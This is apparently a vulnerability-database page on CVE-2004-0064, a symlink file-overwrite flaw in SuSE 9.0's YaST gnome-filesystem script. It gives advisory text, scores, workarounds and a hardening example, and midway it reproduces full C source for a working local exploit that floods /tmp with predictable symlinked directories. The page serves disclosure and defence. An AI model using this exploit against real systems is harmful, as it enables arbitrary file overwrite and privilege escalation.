CVE-2004-0064
CVSS 2.1
Published: 2004-02-17 00:00:00
Last revised: 2016-10-17 22:40:26

[Original] The SuSEconfig.gnome-filesystem script for YaST in SuSE 9.0 allows local users to overwrite arbitrary files via a symlink attack on files within the tmp.SuSEconfig.gnome-filesystem.$RANDOM temporary directory.


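[CNNVD] SuSE YaST SuSEconfig.gnome-filesystem insecure temporary file creation vulnerability (CNNVD-200402-078)

SuSE is an open-source Linux system.
SuSEconfig.gnome-filesystem creates temporary files in an insecure manner; a local attacker can exploit this vulnerability to damage system files through a symbolic link attack.
After the script is executed through YaST, the temporary file '/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM' is created, where RANDOM is a random number (generally between 1 and 33000). The file is created with permissions that make it writable by any user. By creating a symbolic link that points to an arbitrary system file, the file the link points to can be overwritten when the script runs, which can lead to a system crash or privilege escalation.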
        

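- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]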

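- CPE (affected platforms and products)

Product and version information (CPE) is not currently available

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0064
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0064
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200402-078
(official data source) CNNVD

- Other links and resources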

http://marc.info/?l=bugtraq&m=107402658600437&w=2
(UNKNOWN)  BUGTRAQ  20040113 SuSE linux 9.0 YaST config Skribt [exploit]
http://www.securityfocus.com/bid/9411
(VENDOR_ADVISORY)  BID  9411
http://www.securitytracker.com/id?1008703
(UNKNOWN)  SECTRACK  1008703

- Vulnerability information

SuSE YaST SuSEconfig.gnome-filesystem insecure temporary file creation vulnerability
Low risk  Other
2004-02-17 00:00:00 2005-10-20 00:00:00
Local
        
        

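- Advisories and patches

Vendor patch:
S.u.S.E.
--------
The vendor has released an upgrade patch that fixes this security issue; download it from the vendor's home page:

http://www.suse.com/en/support/security/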

- Vulnerability information (144)

SuSE linux 9.0 YaST config Skribt Local Exploit (EDBID:144)
linux local
2004-01-15 Verified
0 l0om
N/A
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>   /* mkdir(), umask() */

#define PATH "/tmp/tmp.SuSEconfig.gnome-filesystem."
#define START 1
#define END 33000

int main(int argc, char **argv)
{
    int i;
    char buf[150];

    printf("\tSuSE 9.0 YaST script SuSEconfig.gnome-filesystem exploit\n");
    printf("\t-------------------------------------------------------------\n");
    printf("\tdiscovered and written by l0om <l0om excluded org>\n");
    printf("\t WWW.EXCLUDED.ORG\n\n");

    if(argc != 2) {
        printf("usage: %s <destination-file>\n",argv[0]);
        exit(0xff);
    }

    printf("### hit enter to create or overwrite file %s: ",argv[1]); fflush(stdout);
    read(1, buf, 1); fflush(stdin);

    /* Clear the umask so the directories below are created world-writable. */
    umask(0000);
    printf("working\n\n");
    /* Pre-create every directory name the script's $RANDOM suffix can take,
       each holding a symlink "found" that points at the destination file. */
    for(i = START; i < END; i++) {
        snprintf(buf, sizeof(buf),"%s%d",PATH,i);
        if(mkdir(buf,00777) == -1) {
            fprintf(stderr, "cannot creat directory [Nr.%d]\n",i);
            exit(0xff);
        }
        if(!(i%1000))printf(".");
        strcat(buf, "/found");
        if(symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot creat symlink from %s to %s [Nr.%d]\n",buf,argv[1],i);
            exit(0xff);
        }
    }
    printf("\ndone!\n");
    printf("next time the SuSE.gnome-filesystem script gets executed\n");
    printf("we will create or overwrite file %s\n",argv[1]);
    return(0x00);
}  /* i cant wait for the new gobbles comic!! */

// milw0rm.com [2004-01-15]
		

- Vulnerability information

3460
SuSE SuSEconfig.gnome-filesystem Symlink Arbitrary File Overwrite
Local Access Required Race Condition
Loss of Integrity

- Vulnerability description

The 'SuSEconfig.gnome-filesystem' script for YaST on SuSE Linux contains a flaw that may allow a malicious local user to manipulate arbitrary files on the system. The issue is due to the script creating temporary files insecurely in the 'tmp.SuSEconfig.gnome-filesystem.$RANDOM' temporary directory. It is possible for a user to use a symlink style attack to manipulate arbitrary files, resulting in a loss of integrity.

- Timeline

2004-01-12 Unknown
Unknown Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. A potential workaround is to edit the SuSEconfig.gnome-filesystem script and change TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$RANDOM to something like TEMP=/tmp/tmp.SuSEconfig.gnome-filesystem.$$, making the PID-based number more difficult to predict.
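The workaround above only makes the directory name harder to guess. As an added example (not SuSE's script and not the vendor's fix), the shell functions below show the usual hardening for this class of bug: an atomically created private directory, refusal to adopt a pre-existing path, and a write that does not follow a planted symlink. The function names and the `example` directory prefix are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not SuSE's script. Function names and the "example"
# directory prefix are constructed for illustration.

# Create a scratch directory that no other local user can have prepared:
# mktemp -d picks an unpredictable suffix and creates the directory
# atomically with mode 0700, failing instead of reusing an existing path.
make_private_tmpdir() {
    mktemp -d "${TMPDIR:-/tmp}/tmp.SuSEconfig.example.XXXXXXXXXX"
}

# Claim a directory whose name is fixed or guessable. Plain mkdir (no -p)
# fails if anything already exists at that path, including a symlink or a
# directory planted in advance, so a prepared directory is never adopted.
claim_dir() {
    ( umask 077 && mkdir -- "$1" ) 2>/dev/null
}

# Write stdin to a new file without following a symlink planted at the
# destination: with noclobber (set -C) the shell refuses an existing path
# and creates a missing one exclusively.
write_new_file() {
    ( set -C; cat > "$1" ) 2>/dev/null
}
```
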

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

SuSE YaST SuSEconfig.gnome-filesystem Local Insecure File Creation Symlink Vulnerability
Origin Validation Error 9411
No Yes
2004-01-13 12:00:00 2004-01-13 12:00:00
Discovery of this vulnerability has been credited to l0om <l0om@excluded.org>.

- Affected program versions

S.u.S.E. SuSEconfig.gnome-filesystem
+ S.u.S.E. Linux Personal 9.0

- Vulnerability discussion

SuSEconfig.gnome-filesystem has been reported prone to an insecure file creation vulnerability that may be exploited to corrupt arbitrary files. The issue has been reported to present itself because the SuSEconfig.gnome-filesystem script will follow symbolic links when writing certain specific files.

SuSE Linux 9.0 has been reported to be prone to this issue; however, other versions could be affected as well.

- Exploit

The following proof of concept exploit has been supplied:

- Solution

The vendor has reported that this issue has been fixed in SuSE 9.0 stable.

- Related references

 

 
